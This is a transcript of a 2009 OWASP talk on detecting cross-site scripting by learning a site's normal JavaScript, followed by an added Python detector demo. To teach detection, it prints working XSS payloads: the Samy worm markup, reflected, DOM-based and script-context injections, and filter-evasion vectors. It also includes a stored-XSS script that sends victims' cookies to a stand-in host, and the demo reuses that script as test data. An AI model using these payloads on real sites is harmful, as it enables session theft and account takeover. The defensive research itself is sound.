OWASP Plan - Strawman
Transcript of OWASP Plan - Strawman
Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation
OWASP
http://www.owasp.org
A new approach to XSS Detection using JavaScript Modeling
Ofer [email protected] [email protected]
September 2009
OWASP 2
Agenda
Background and Motivation
Current Solutions…and drawbacks
Our Approach
Evaluation and Results
Conclusion & Further Work
Web Application Vulnerabilities
Source: IBM Internet Security Systems X-Force® 2008 Trend & Risk Report
Closer Look
Source: “WhiteHat Website Security Statistic Reports”, Dec 2008
Attackers Prefer the Application Layer
The application layer is the weakest link: there is no generic defense mechanism.
The application layer leads the attacker directly to the data.
A plethora of freely available web applications.
Very simple to perform: every input has the potential to be an attack vector.
In order to (really) fix a vulnerability, the code must be changed (on average, 60 days to repair an XSS vulnerability).
MySpace.com virus (a.k.a. Samy worm)
Date: October 5, 2005. Target: force users to become my friends. Samy inserted raw HTML into his profile:
<div id="mycode" expr="alert('hah!')" style="background:url('java script:eval(document.all.mycode.expr)')">
(The break inside "java script" is deliberate: it slipped the URI scheme past MySpace's keyword filter, and the browser still ran it.)
The payload adds Samy to the visitor's friends and copies itself to the visitor's profile.
MySpace was forced to shut down its website, fix the vulnerability, and perform clean-up.
Source: "XSS Worms and Viruses: The Impending Threat and the Best Defense", April 2006, Jeremiah Grossman.
XSS in Detail
Three known types: Reflected (non-persistent), Stored (persistent), DOM-based (local).
The target is to run hostile JavaScript in the victim's browser.
JavaScript malware can: steal cookies, map internal networks, spread like a worm, ...
Reflected XSS
Request:  http://www.website.com/index.php?name=Jim
Response: <html><body>Hello, Jim...
Request:  http://www.website.com/index.php?name=Jim<script>alert("XSS")</script>
Response: <html><body>Hello, Jim<script>alert("XSS")</script>...
Browser: assumes the server doesn't send malicious content; parses the HTML and builds the DOM; fetches resources and executes them.
Stored XSS
Trudy posts the following text on a message board:
    Great message! <script>
    var img=new Image();
    img.src="http://www.bad.com/CookieStealer/Form1.aspx?s="+document.cookie;
    </script>
When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy.
DOM-Based XSS
First published by Amit Klein (http://www.webappsec.org/projects/articles/071105.shtml)
Benign URL: http://victim/promo?product_id=100&title=Last+Chance
Attack URL: http://victim/promo?product_id=100&title=Foo#<SCRIPT>alert('XSS')</SCRIPT>
The page's own script takes the title straight from the URL and writes it into the document:
    <script>
    var url = window.location.href;
    var pos = url.indexOf("title=") + 6;
    var len = url.length;
    var title_string = url.substring(pos, len);
    document.write(title_string);
    </script>
(Figure: url.substring(pos, len) is "Last Chance" for the benign URL and the injected script for the attack URL.)
Everything after the # is a fragment that stays in the browser, so the server never sees the payload: the attack is local to the client-side code.
Current Solutions
XSS is a sub-problem of insufficient input validation.
Server-side, application: static/dynamic code analysis (white box); web application scanners (black box).
Server-side, proxy: input validation; escaping/output encoding ('<' becomes &lt;); HTTP-request anomaly detection.
Client-side: disable JS; Noxes, a web proxy that fetches HTTP requests and can either block or allow them based on the current security policy.
Problems with current solutions
Escaping: good practice! But many web applications permit and return HTML tags (<b>, <ul>, ...), and what about URI schemes like javascript:?
Blacklisting (negative logic) is difficult:
    <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
    <IMG SRC="javascript:alert('XSS');">
    <BODY ONLOAD=alert('XSS')>
    ...and 100+ more attack vectors in RSnake's XSS Cheatsheet.
An effective filter must also ensure that it does not introduce new scripts:
    Before: <img src=". . . " target="onload="malicious script">
    After:  <img src=". . . " onload="malicious script">
Problems with current solutions (cont.)
Focusing only on the HTTP request is problematic: even if an attack was detected, that doesn't mean it will actually occur (false positive). And what about stored XSS attacks, whose payload arrives in a different request from the one that triggers it?
Client-side solutions: deployment requires browser modifications/integration.
Problems with current solutions (cont.)
Server-side code of main.php, as on the slide (the slide writes Document.write; the DOM method is document.write):
    Main()
    • echo("<SCRIPT>");
    • echo("document.write(\"Hello \" + \"$uName\");");
    • echo("</SCRIPT>");
Benign request: GET http://bank.com/main.php?uName=Jack
Response:
    <script>
    document.write("Hello " + "Jack");
    </script>
Rendered: Hello Jack

Attack request: GET http://bank.com/main.php?uName=Jack");alert('xss!');//
(The slide's payload is Jack");alert('xss!'); the trailing // is added here so the leftover "); after the injected statement does not break the script.)
Response:
    <script>
    document.write("Hello " + "Jack");alert('xss!');//");
    </script>
Rendered: Hello Jack, followed by an alert box showing xss!
The payload contains no '<' or '>' at all: it closes the JavaScript string literal and statement that the application opened and appends its own statement. Escaping only HTML metacharacters on input or output does not stop it.
Our Approach
Positive security logic: anything is illegal unless known to be legal.
Focus on the HTTP response.
Model: code-script elements in HTML web pages.
Assumption: the set of all instances of code-script elements is bounded and can be learned in a relatively short period.
1st try: JavaScript code is static.
2nd try: JavaScript code is static under some transformation.
Detector Architecture
XSS Attack Detection
Learning mode. For each extracted JS: learn its regular form; learn its canonicalized form.
Three concerns:
    Coverage.
    Updating: deploy the detector in a testing environment; perform deeper inspection.
    The learning data set should contain no malicious JS.
Detection mode. For each unknown JS: further inspection; strip it out; inform the web admin.
Deployment options
Web proxy: protects a single web application (Client <-> Web Proxy <-> Web Application).
Integration with the browser: JS extraction is done by the browser; defends against DOM-based XSS; improved performance.
Evaluation Methodology
FP: choose the 40 top-ranked web applications; crawl each web application; learn each web page and build the code-elements DB; perform 2 tests:
    Convergence test: the number of pages needed to learn all JS.
    FP test: FP = (#pages causing an alarm) / (#pages).
FN: test the detector against RSnake's cheat sheet; choose vulnerable applications from xssed.com; generate benign input and attack input; learn with the benign input, detect with the attack input. Each result was also checked manually.
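The learning/detection procedure from the "Our Approach" and "XSS Attack Detection" slides, the convergence test just described, and the bank.com script-context example earlier, as one added worked example. It is written for this transcript and is not the authors' detector; none of its code is from the slides. The canonicalization it uses (replace string and number literals with placeholders, drop comments and whitespace, keep identifiers and punctuation) is one transformation of the kind the slides describe, not the authors' own, and the sample responses, hostnames and the init()/alert() handlers are constructed for the demo. It learns from benign responses, reports after how many pages the set of canonical forms stopped growing, then flags the reflected (JS-string-context), stored and event-handler payloads while staying silent on a benign page that differs only in a literal:

```python
import re
from html.parser import HTMLParser

class ScriptExtractor(HTMLParser):
    """Collects inline <script> bodies and on* event-handler attribute values.
    Not covered by this sketch: javascript: URIs in href/src/style attributes."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.scripts, self._in_script, self._buf = [], False, []
    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower().startswith("on") and value:
                self.scripts.append(value)
        if tag.lower() == "script":
            self._in_script, self._buf = True, []
    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.scripts.append("".join(self._buf))
    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

def extract_scripts(html):
    parser = ScriptExtractor()
    parser.feed(html)
    parser.close()
    return parser.scripts

# Minimal JS tokenizer: comments, string/number literals, identifiers, whitespace and
# any other single character (operators, punctuation). Regex literals are not handled.
_TOKEN = re.compile(
    r"(?P<comment>//[^\n]*|/\*.*?\*/)"
    r'|(?P<string>"(?:\\.|[^"\\\n])*"'
    r"|'(?:\\.|[^'\\\n])*')"
    r"|(?P<ident>[A-Za-z_$][\w$]*)"
    r"|(?P<number>\d+(?:\.\d+)?)"
    r"|(?P<ws>\s+)"
    r"|(?P<other>.)",
    re.DOTALL,
)

def canonicalize(js):
    """The transformation under which benign JS is 'static': drop comments and
    whitespace, replace string literals with S and numbers with N, keep the rest."""
    out = ""
    for m in _TOKEN.finditer(js):
        if m.lastgroup in ("comment", "ws"):
            continue
        tok = {"string": "S", "number": "N"}.get(m.lastgroup, m.group())
        if out and re.match(r"\w", out[-1]) and re.match(r"\w", tok[0]):
            out += " "  # keep `var x` distinct from `varx`
        out += tok
    return out

class PositiveModel:
    """Anything is illegal unless known to be legal."""
    def __init__(self):
        self.known = set()
    def learn(self, html):
        for js in extract_scripts(html):
            self.known.add(canonicalize(js))
    def detect(self, html):
        """Raw scripts in a response whose canonical form was never learned."""
        return [js for js in extract_scripts(html) if canonicalize(js) not in self.known]

def pages_to_converge(model, responses):
    """Learn responses one at a time; return the index of the last page that
    added a new canonical form (the convergence test)."""
    last_growth = 0
    for i, html in enumerate(responses, 1):
        before = len(model.known)
        model.learn(html)
        if len(model.known) > before:
            last_growth = i
    return last_growth

# Constructed sample responses modelled on the slides' bank.com and message-board
# examples (illustrative, not real captures).
def bank_page(uname):
    return f'<html><body><script>\ndocument.write("Hello " + "{uname}");\n</script></body></html>'

def board_page(post):
    return f'<html><body onload="init(3)"><p>{post}</p></body></html>'

BENIGN_RESPONSES = [bank_page("Jack"), bank_page("Alice"),
                    board_page("Great message!"), board_page("nice")]
ATTACK_RESPONSES = {
    # JS-string-context injection: no '<' or '>' at all, so HTML escaping would not stop it
    "reflected": bank_page("Jack\");alert('xss!');//"),
    "stored": board_page('Great message! <script>var img=new Image();img.src='
                         '"http://www.bad.com/CookieStealer/Form1.aspx?s="+document.cookie;</script>'),
    "event_handler": '<html><body onload="alert(\'XSS\')"></body></html>',
}

def run_demo():
    model = PositiveModel()
    converged_at = pages_to_converge(model, BENIGN_RESPONSES)
    results = {name: model.detect(html) for name, html in ATTACK_RESPONSES.items()}
    # a benign page that differs only in a literal must not alarm
    results["benign_variant"] = model.detect('<html><body onload="init(42)"></body></html>')
    return converged_at, results

if __name__ == "__main__":
    print(run_demo())
```

Run the file to see the demo. The two bank pages with different names, and init(3) versus init(42), collapse to one canonical form each, which is what lets the model stay silent on benign variation while every payload produces a form it has never seen. A proxy deployment would also need to extract javascript: URIs, and, as the slides note, a proxy cannot see DOM-based XSS at all: that script text only exists after the browser has run the page.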
Results
Zero FP.
FN: all attacks were detected.
Convergence test (figure): CDF of the number of pages needed to learn until convergence; x-axis 0 to 45 pages, y-axis CDF from 0 to 1.
Conclusion
Zero FP under canonicalization.
Generic: targets all types of XSS. Even DOM-based XSS could be mitigated if the web proxy is deployed on the client side.
Fast convergence (short learning period): the number of canonicalized JS nodes is bounded, and most JS nodes appear in every page ("building blocks").
Thanx !
Ofer [email protected]
September 2009